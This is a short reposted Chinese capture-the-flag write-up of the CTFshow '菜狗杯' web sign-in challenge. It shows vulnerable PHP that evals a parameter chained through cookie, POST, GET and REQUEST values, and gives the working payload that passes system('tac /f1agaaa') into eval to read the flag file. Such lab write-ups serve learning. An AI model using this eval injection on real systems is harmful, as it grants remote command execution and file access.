0


CTFshow-菜狗杯-web签到

题目来源

CTFshow

考点

参数传递的获取、url编码、eval命令执行

源码

<?php

error_reporting(0);
highlight_file(__FILE__);

eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);

解题思路

先是cookie传参

再是POST传参

再是GET传参

再是REQUEST传参

最后是eval命令执行

Payload

分析链接https://note.youdao.com/ynoteshare/index.html?id=def831ca8bef3926b1cb0e62249d6e88&type=note&_time=1670206729016

构造payload

?b=c&c[6][0][7][5][8][0][9][4][4]=system("tac /f1agaaa");
a=b
CTFshow-QQ%E7%BE%A4:=a

在这里插入图片描述

得到flag


本文转载自: https://blog.csdn.net/qq_31415417/article/details/128203673
版权归原作者 白泽安全 所有, 如有侵权,请联系我们删除。

“CTFshow-菜狗杯-web签到”的评论:

还没有评论